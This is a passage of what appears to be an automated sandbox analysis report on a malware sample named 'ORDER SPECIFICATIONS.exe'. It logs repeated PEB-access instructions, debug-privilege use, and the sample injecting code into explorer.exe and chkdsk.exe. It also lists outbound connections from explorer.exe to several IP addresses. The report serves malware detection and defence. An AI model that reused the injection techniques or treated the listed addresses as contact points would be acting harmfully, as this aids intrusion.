            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015446A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01590EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01590EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01590EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05567D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05583D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05549100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05549100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05549100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05618D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055CA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05574D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05574D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05574D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05564120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055F8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055D41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05571DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05571DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05571DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055735A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05560050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05560050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05602073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05611074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0561740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0561740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0561740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05614015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05614015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056014FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05618CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05549080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055890AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05618F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05573B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05573B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05618B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0561070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0561070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05544F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05544F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0560131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055837F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05558794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05615BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05551B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05551B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055FD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0560138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05618A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055D4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0558927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05563A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05578E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05558A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055FFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055736CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055FFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05588EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055716E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05618ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055576E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05610EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05610EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05610EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055DFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 170.106.171.56 80
            Source: C:\Windows\explorer.exeNetwork Connect: 54.85.86.211 80
            Source: C:\Windows\explorer.exeNetwork Connect: 13.57.130.120 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.90.54.238 80
            Source: C:\Windows\explorer.exeNetwork Connect: 50.87.196.120 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeNetwork Connect: 156.240.32.114 80
            Source: C:\Windows\explorer.exeNetwork Connect: 154.91.61.105 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeMemory written: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeThread register set: target process: 3472
            Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3472
            Queues an APC in another process (thread injection)Show sources
